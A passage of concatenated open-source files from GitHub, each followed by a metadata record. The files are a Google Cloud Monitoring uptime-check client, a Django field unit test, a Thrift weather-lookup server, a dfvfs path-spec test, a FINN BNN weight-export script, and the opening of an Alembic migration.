retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Lists the existing valid Uptime check configurations for the project
(leaving out any invalid configurations).
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>> # Iterate over all results
>>> for element in client.list_uptime_check_configs(parent):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_uptime_check_configs(parent).pages:
... for element in page:
... # process element
... pass
Args:
parent (str): The project whose Uptime check configurations are listed. The format is
``projects/[PROJECT_ID]``.
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "list_uptime_check_configs" not in self._inner_api_calls:
self._inner_api_calls[
"list_uptime_check_configs"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_uptime_check_configs,
default_retry=self._method_configs["ListUptimeCheckConfigs"].retry,
default_timeout=self._method_configs["ListUptimeCheckConfigs"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.ListUptimeCheckConfigsRequest(
parent=parent, page_size=page_size,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_uptime_check_configs"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="uptime_check_configs",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def get_uptime_check_config(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets a single Uptime check configuration.
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> name = client.uptime_check_config_path('[PROJECT]', '[UPTIME_CHECK_CONFIG]')
>>>
>>> response = client.get_uptime_check_config(name)
Args:
name (str): The Uptime check configuration to retrieve. The format is
``projects/[PROJECT_ID]/uptimeCheckConfigs/[UPTIME_CHECK_ID]``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "get_uptime_check_config" not in self._inner_api_calls:
self._inner_api_calls[
"get_uptime_check_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_uptime_check_config,
default_retry=self._method_configs["GetUptimeCheckConfig"].retry,
default_timeout=self._method_configs["GetUptimeCheckConfig"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.GetUptimeCheckConfigRequest(name=name,)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["get_uptime_check_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def create_uptime_check_config(
self,
parent,
uptime_check_config,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Creates a new Uptime check configuration.
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> parent = client.project_path('[PROJECT]')
>>>
>>> # TODO: Initialize `uptime_check_config`:
>>> uptime_check_config = {}
>>>
>>> response = client.create_uptime_check_config(parent, uptime_check_config)
Args:
parent (str): The project in which to create the Uptime check. The format is
``projects/[PROJECT_ID]``.
uptime_check_config (Union[dict, ~google.cloud.monitoring_v3.types.UptimeCheckConfig]): The new Uptime check configuration.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "create_uptime_check_config" not in self._inner_api_calls:
self._inner_api_calls[
"create_uptime_check_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.create_uptime_check_config,
default_retry=self._method_configs["CreateUptimeCheckConfig"].retry,
default_timeout=self._method_configs["CreateUptimeCheckConfig"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.CreateUptimeCheckConfigRequest(
parent=parent, uptime_check_config=uptime_check_config,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("parent", parent)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["create_uptime_check_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def update_uptime_check_config(
self,
uptime_check_config,
update_mask=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Updates an Uptime check configuration. You can either replace the entire
configuration with a new one or replace only certain fields in the
current configuration by specifying the fields to be updated via
``updateMask``. Returns the updated configuration.
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> # TODO: Initialize `uptime_check_config`:
>>> uptime_check_config = {}
>>>
>>> response = client.update_uptime_check_config(uptime_check_config)
Args:
uptime_check_config (Union[dict, ~google.cloud.monitoring_v3.types.UptimeCheckConfig]): Required. If an ``updateMask`` has been specified, this field gives the
values for the set of fields mentioned in the ``updateMask``. If an
``updateMask`` has not been given, this Uptime check configuration
replaces the current configuration. If a field is mentioned in
``updateMask`` but the corresonding field is omitted in this partial
Uptime check configuration, it has the effect of deleting/clearing the
field from the configuration on the server.
The following fields can be updated: ``display_name``, ``http_check``,
``tcp_check``, ``timeout``, ``content_matchers``, and
``selected_regions``.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig`
update_mask (Union[dict, ~google.cloud.monitoring_v3.types.FieldMask]): Optional. If present, only the listed fields in the current Uptime check
configuration are updated with values from the new configuration. If this
field is empty, then the current configuration is completely replaced with
the new configuration.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.monitoring_v3.types.FieldMask`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.monitoring_v3.types.UptimeCheckConfig` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "update_uptime_check_config" not in self._inner_api_calls:
self._inner_api_calls[
"update_uptime_check_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.update_uptime_check_config,
default_retry=self._method_configs["UpdateUptimeCheckConfig"].retry,
default_timeout=self._method_configs["UpdateUptimeCheckConfig"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.UpdateUptimeCheckConfigRequest(
uptime_check_config=uptime_check_config, update_mask=update_mask,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("uptime_check_config.name", uptime_check_config.name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
return self._inner_api_calls["update_uptime_check_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def delete_uptime_check_config(
self,
name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Deletes an Uptime check configuration. Note that this method will fail
if the Uptime check configuration is referenced by an alert policy or
other dependent configs that would be rendered invalid by the deletion.
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> name = client.uptime_check_config_path('[PROJECT]', '[UPTIME_CHECK_CONFIG]')
>>>
>>> client.delete_uptime_check_config(name)
Args:
name (str): The Uptime check configuration to delete. The format is
``projects/[PROJECT_ID]/uptimeCheckConfigs/[UPTIME_CHECK_ID]``.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "delete_uptime_check_config" not in self._inner_api_calls:
self._inner_api_calls[
"delete_uptime_check_config"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.delete_uptime_check_config,
default_retry=self._method_configs["DeleteUptimeCheckConfig"].retry,
default_timeout=self._method_configs["DeleteUptimeCheckConfig"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.DeleteUptimeCheckConfigRequest(name=name,)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [("name", name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(
routing_header
)
metadata.append(routing_metadata)
self._inner_api_calls["delete_uptime_check_config"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_uptime_check_ips(
self,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Returns the list of IP addresses that checkers run from
Example:
>>> from google.cloud import monitoring_v3
>>>
>>> client = monitoring_v3.UptimeCheckServiceClient()
>>>
>>> # Iterate over all results
>>> for element in client.list_uptime_check_ips():
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_uptime_check_ips().pages:
... for element in page:
... # process element
... pass
Args:
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.monitoring_v3.types.UptimeCheckIp` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
if metadata is None:
metadata = []
metadata = list(metadata)
# Wrap the transport method to add retry and timeout logic.
if "list_uptime_check_ips" not in self._inner_api_calls:
self._inner_api_calls[
"list_uptime_check_ips"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_uptime_check_ips,
default_retry=self._method_configs["ListUptimeCheckIps"].retry,
default_timeout=self._method_configs["ListUptimeCheckIps"].timeout,
client_info=self._client_info,
)
request = uptime_service_pb2.ListUptimeCheckIpsRequest(page_size=page_size,)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_uptime_check_ips"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="uptime_check_ips",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
| {
"content_hash": "effd5cf611d0c10e4d13a5d518cc8c96",
"timestamp": "",
"source": "github",
"line_count": 752,
"max_line_length": 171,
"avg_line_length": 43.89627659574468,
"alnum_prop": 0.6078461072402302,
"repo_name": "tswast/google-cloud-python",
"id": "d9dd41a0b5c54488bd22a299163f3a9dce85d159",
"size": "33612",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "monitoring/google/cloud/monitoring_v3/gapic/uptime_check_service_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "33785371"
},
{
"name": "Shell",
"bytes": "9148"
}
],
"symlink_target": ""
} |
import unittest
import defaulting
from random import random
from django.dispatch import dispatcher
class emptyo(object):
"Just sits there to have attributes assigned to it"
pass
class TestDefaulting(unittest.TestCase):
"""Test Defaultin."""
def setUp(self):
"""Create a few DefaultingCharFields."""
self.dcfValue = random()
self.dcf = defaulting.DefaultingCharField(self.dcfValue)
self.dcf2 = defaulting.DefaultingCharField()
self.__class__._meta = emptyo()
def add_field(f):
pass
self.__class__._meta.add_field = add_field
self.__class__._meta.module_name = "testaudit"
self.__class__._meta.object_name = "TestUpdatedByField"
def testInit(self):
self.assertEqual(self.dcfValue, self.dcf.default_from_field)
self.assert_(self.dcf2.default_from_field is None)
self.assert_(isinstance(self.dcf, defaulting.DefaultingCharField))
def testInternalType(self):
self.assertEqual("CharField", self.dcf.get_internal_type())
suite = unittest.TestLoader().loadTestsFromTestCase(TestDefaulting)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "75501db394f417dac632df6ae50b47d0",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 74,
"avg_line_length": 27.976744186046513,
"alnum_prop": 0.6550290939318371,
"repo_name": "hudora/huDjango",
"id": "7d9b3854809b296cbcc318f13dfbce5c76d769c0",
"size": "1251",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hudjango/fields/testdefaulting.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "102049"
}
],
"symlink_target": ""
} |
import sys
sys.path.append('../')
from WeatherConfig import*
from lucidatypes.ttypes import QuerySpec
from lucidaservice import LucidaService
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
import json
import urllib
class WeatherHandler(LucidaService.Iface):
def create(self, LUCID, spec):
"""
Do nothing
"""
return
def learn(self, LUCID, knowledge):
"""
Do nothing
"""
return
def infer(self, LUCID, query):
"""
Determine the weather based off input
Parameters:
- LUCID: ID of Lucida user
- query: query
"""
input_data = query.content[0].data[-1]
result = 'No weather found for %s' % input_data
url_location = urllib.quote_plus(input_data)
# weather from Weather Underground
try:
f = urllib.urlopen(WU_API_URL_BASE + \
'%s/conditions/q/%s.json' % (WU_API_KEY, url_location))
json_string = f.read()
parsed_json = json.loads(json_string)
if 'error' not in parsed_json['response'] \
and 'current_observation' in parsed_json:
weather = parsed_json['current_observation']['weather']
temp = parsed_json['current_observation']['temperature_string']
city = parsed_json['current_observation']['display_location']['full']
result = "Current weather in %s is %s %s" % (city, weather, temp)
print 'From Weather Underground: %s' % result
else:
# weather from Open Weather Map
f = urllib.urlopen(OWM_API_URL_BASE + \
'q=%s&appid=%s&units=imperial&type=like' % (url_location, OWM_API_KEY))
json_string = f.read()
parsed_json = json.loads(json_string)
if 'weather' in parsed_json and 'main' in parsed_json and 'name' in parsed_json:
weather = parsed_json['weather'][0]['main']
temp = parsed_json['main']['temp']
city = parsed_json['name']
if city in input_data:
result = 'Current weather in %s is %s, %s F' % (city, weather, temp)
print 'From Open Weather Map: %s' % result
f.close()
except IOError as err:
if 401 in err:
result = 'Unauthorized Weather API keys'
else:
result = 'Weather Service is broken!'
return result
# Set handler to our implementation
handler = WeatherHandler()
processor = LucidaService.Processor(handler)
transport = TSocket.TServerSocket(port=PORT)
tfactory = TTransport.TFramedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
print 'WE at port %d' % PORT
server.serve()
| {
"content_hash": "2b718d530bcc86216ea6c07abae31a0c",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 96,
"avg_line_length": 35.89411764705882,
"alnum_prop": 0.5811209439528023,
"repo_name": "claritylab/sirius",
"id": "8ae390520eaf6f16a7cdbb742015196cdd651094",
"size": "3074",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lucida/weather/server/WeatherServer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "1151"
},
{
"name": "Batchfile",
"bytes": "777"
},
{
"name": "C",
"bytes": "11598"
},
{
"name": "C++",
"bytes": "367354"
},
{
"name": "Cuda",
"bytes": "30380"
},
{
"name": "Java",
"bytes": "1175055"
},
{
"name": "JavaScript",
"bytes": "1356"
},
{
"name": "Makefile",
"bytes": "24290"
},
{
"name": "PHP",
"bytes": "531"
},
{
"name": "Pascal",
"bytes": "87"
},
{
"name": "Protocol Buffer",
"bytes": "1501"
},
{
"name": "Python",
"bytes": "19987"
},
{
"name": "Shell",
"bytes": "19289"
},
{
"name": "Thrift",
"bytes": "4220"
}
],
"symlink_target": ""
} |
"""Tests for the PHDI image path specification implementation."""
import unittest
from dfvfs.path import phdi_path_spec
from tests.path import test_lib
class PHDIPathSpecTest(test_lib.PathSpecTestCase):
"""Tests for the PHDI image path specification implementation."""
def testInitialize(self):
"""Tests the path specification initialization."""
path_spec = phdi_path_spec.PHDIPathSpec(parent=self._path_spec)
self.assertIsNotNone(path_spec)
with self.assertRaises(ValueError):
phdi_path_spec.PHDIPathSpec(parent=None)
with self.assertRaises(ValueError):
phdi_path_spec.PHDIPathSpec(parent=self._path_spec, bogus='BOGUS')
def testComparable(self):
"""Tests the path specification comparable property."""
path_spec = phdi_path_spec.PHDIPathSpec(parent=self._path_spec)
self.assertIsNotNone(path_spec)
expected_comparable = '\n'.join([
'type: TEST',
'type: PHDI',
''])
self.assertEqual(path_spec.comparable, expected_comparable)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "06e287754aed14eeeab120fd78bcf299",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 72,
"avg_line_length": 26.725,
"alnum_prop": 0.7043966323666978,
"repo_name": "joachimmetz/dfvfs",
"id": "01e90c17ca57b2e290a5660aa90f420664991ef1",
"size": "1115",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "tests/path/phdi_path_spec.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "14212"
},
{
"name": "Makefile",
"bytes": "122"
},
{
"name": "PowerShell",
"bytes": "1021"
},
{
"name": "Python",
"bytes": "2176548"
},
{
"name": "Shell",
"bytes": "19355"
}
],
"symlink_target": ""
} |
# BSD 3-Clause License
# =======
# Copyright (c) 2020, Xilinx
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
from finnthesizer import *
if __name__ == "__main__":
bnnRoot = "."
npzFile = bnnRoot + "/cifar10-1w-2a.npz"
targetDirBin = bnnRoot + "/cnvW1A2"
targetDirHLS = bnnRoot + "/cnvW1A2/hw"
#topology of convolutional layers (only for config.h defines)
ifm = [32, 30, 14, 12, 5, 3]
ofm = [30, 28, 12, 10, 3, 1]
ifm_ch = [ 3, 64, 64, 128, 128, 256]
ofm_ch = [64, 64, 128, 128, 256, 256]
filterDim = [ 3, 3, 3, 3, 3, 3]
WeightsPrecisions_integer = [1 , 1 , 1 , 1 , 1 , 1 , 1, 1, 1]
WeightsPrecisions_fractional = [0 , 0 , 0 , 0 , 0 , 0 , 0, 0, 0]
InputPrecisions_integer = [1 , 2 , 2 , 2 , 2 , 2 , 2, 2, 2]
InputPrecisions_fractional = [7 , 0 , 0 , 0 , 0 , 0 , 0, 0, 0]
ActivationPrecisions_integer = [2 , 2 , 2 , 2 , 2 , 2 , 2, 2, 16]
ActivationPrecisions_fractional = [0 , 0 , 0 , 0 , 0 , 0 , 0, 0, 0]
classes = ['Airplane', 'Automobile', 'Bird', 'Cat', 'Deer', 'Dog', 'Frog', 'Horse', 'Ship', 'Truck']
#configuration of PE and SIMD counts
peCounts = [16, 32, 16, 16, 4, 1, 1, 1, 4]
simdCounts = [ 3, 32, 32, 32, 32, 32, 4, 8, 1]
if not os.path.exists(targetDirBin):
os.mkdir(targetDirBin)
if not os.path.exists(targetDirHLS):
os.mkdir(targetDirHLS)
#read weights
rHW = BNNWeightReader(npzFile, True)
config = "/**\n"
config+= " * Finnthesizer Config-File Generation\n";
config+= " *\n **/\n\n"
config+= "#ifndef __LAYER_CONFIG_H_\n#define __LAYER_CONFIG_H_\n\n"
# process convolutional layers
for convl in range(0, 6):
peCount = peCounts[convl]
simdCount = simdCounts[convl]
WPrecision_fractional = WeightsPrecisions_fractional[convl]
APrecision_fractional = ActivationPrecisions_fractional[convl]
IPrecision_fractional = InputPrecisions_fractional[convl]
WPrecision_integer = WeightsPrecisions_integer[convl]
APrecision_integer = ActivationPrecisions_integer[convl]
IPrecision_integer = InputPrecisions_integer[convl]
print("Using peCount = %d simdCount = %d for engine %d" % (peCount, simdCount, convl))
# use fixed point weights for the first layer
(usePopCount, numThresBits, numThresIntBits) = (False, 24, 16) if convl==0 else (False, 16, None)
(w,t) = rHW.readConvBNComplex(WPrecision_fractional, APrecision_fractional, IPrecision_fractional, \
WPrecision_integer, APrecision_integer, IPrecision_integer, \
usePopCount=usePopCount, numThresBits=numThresBits, numThresIntBits=numThresIntBits)
# compute the padded width and height
paddedH = padTo(w.shape[0], peCount)
paddedW = padTo(w.shape[1], simdCount)
# compute memory needed for weights and thresholds
neededWMem = (paddedW * paddedH) // (simdCount * peCount)
neededTMem = paddedH // peCount
print("Layer %d: %d x %d" % (convl, paddedH, paddedW))
print("WMem = %d TMem = %d" % (neededWMem, neededTMem))
print("IPrecision = %d.%d WPrecision = %d.%d APrecision = %d.%d" % (IPrecision_integer, IPrecision_fractional, \
WPrecision_integer,WPrecision_fractional, APrecision_integer, APrecision_fractional))
m = BNNProcElemMem(peCount, simdCount, neededWMem, neededTMem, WPrecision_integer, APrecision_integer, IPrecision_integer, \
WPrecision_fractional, APrecision_fractional, IPrecision_fractional, numThresBits=numThresBits, numThresIntBits=numThresIntBits)
m.addMatrix(w,t,paddedW,paddedH)
config += (printConvDefines("L%d" % convl, filterDim[convl], ifm_ch[convl], ifm[convl], ofm_ch[convl], ofm[convl], simdCount, \
peCount, neededWMem, neededTMem, WPrecision_integer, APrecision_integer, WPrecision_fractional, APrecision_fractional)) + "\n"
#generate HLS weight and threshold header file to initialize memory directly on bitstream generation
# m.createHLSInitFiles(targetDirHLS + "/memdata-" + str(convl) + ".h", str(convl))
#generate binary weight and threshold files to initialize memory during runtime
#because HLS might not work for very large header files
m.createBinFiles(targetDirBin, str(convl))
# process fully-connected layers
for fcl in range(6,9):
peCount = peCounts[fcl]
simdCount = simdCounts[fcl]
WPrecision_fractional = WeightsPrecisions_fractional[fcl]
APrecision_fractional = ActivationPrecisions_fractional[fcl]
IPrecision_fractional = InputPrecisions_fractional[fcl]
WPrecision_integer = WeightsPrecisions_integer[fcl]
APrecision_integer = ActivationPrecisions_integer[fcl]
IPrecision_integer = InputPrecisions_integer[fcl]
print("Using peCount = %d simdCount = %d for engine %d" % (peCount, simdCount, fcl))
if fcl == 8:
(w,t) = rHW.readFCBNComplex_no_thresholds(WPrecision_fractional, APrecision_fractional, IPrecision_fractional, \
WPrecision_integer, APrecision_integer, IPrecision_integer)
paddedH = padTo(w.shape[0], 64)
useThresholds = False
else:
(w,t) = rHW.readFCBNComplex(WPrecision_fractional, APrecision_fractional, IPrecision_fractional, \
WPrecision_integer, APrecision_integer, IPrecision_integer)
paddedH = padTo(w.shape[0], peCount)
useThresholds = True
# compute the padded width and height
paddedW = padTo(w.shape[1], simdCount)
# compute memory needed for weights and thresholds
neededWMem = (paddedW * paddedH) // (simdCount * peCount)
neededTMem = paddedH // peCount
print("Layer %d: %d x %d" % (fcl, paddedH, paddedW))
print("WMem = %d TMem = %d" % (neededWMem, neededTMem))
print("IPrecision = %d.%d WPrecision = %d.%d APrecision = %d.%d" % (IPrecision_integer, IPrecision_fractional, WPrecision_integer,\
WPrecision_fractional, APrecision_integer, APrecision_fractional))
m = BNNProcElemMem(peCount, simdCount, neededWMem, neededTMem, WPrecision_integer, APrecision_integer, IPrecision_integer, \
WPrecision_fractional, APrecision_fractional, IPrecision_fractional)
m.addMatrix(w,t,paddedW,paddedH)
config += (printFCDefines("L%d" % fcl, simdCount, peCount, neededWMem, neededTMem, paddedW, paddedH, \
WPrecision_integer, APrecision_integer, WPrecision_fractional, APrecision_fractional)) + "\n"
#generate HLS weight and threshold header file to initialize memory directly on bitstream generation
# m.createHLSInitFiles(targetDirHLS + "/memdata-" + str(fcl) + ".h", str(fcl), useThresholds)
#generate binary weight and threshold files to initialize memory during runtime
#because HLS might not work for very large header files
m.createBinFiles(targetDirBin, str(fcl), useThresholds)
config+="#endif //__LAYER_CONFIG_H_\n"
configFile = open(targetDirHLS+"/config.h", "w")
configFile.write(config)
configFile.close()
with open(targetDirBin + "/classes.txt", "w") as f:
f.write("\n".join(classes))
| {
"content_hash": "6499a84c8b16c87c1082e23192442b34",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 140,
"avg_line_length": 53.40963855421687,
"alnum_prop": 0.666704263478457,
"repo_name": "Xilinx/BNN-PYNQ",
"id": "f8689dec5ad564574cb891a8bc4834ab2b61f4b1",
"size": "8866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bnn/src/training/cifar10-gen-weights-W1A2.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "15377"
},
{
"name": "C++",
"bytes": "144353"
},
{
"name": "Dockerfile",
"bytes": "5626"
},
{
"name": "Jupyter Notebook",
"bytes": "7698409"
},
{
"name": "Python",
"bytes": "158919"
},
{
"name": "Shell",
"bytes": "14256"
},
{
"name": "Tcl",
"bytes": "520413"
}
],
"symlink_target": ""
} |
"""empty message
Revision ID: 298bbf22bdb8
Revises: b976e7a7dc35
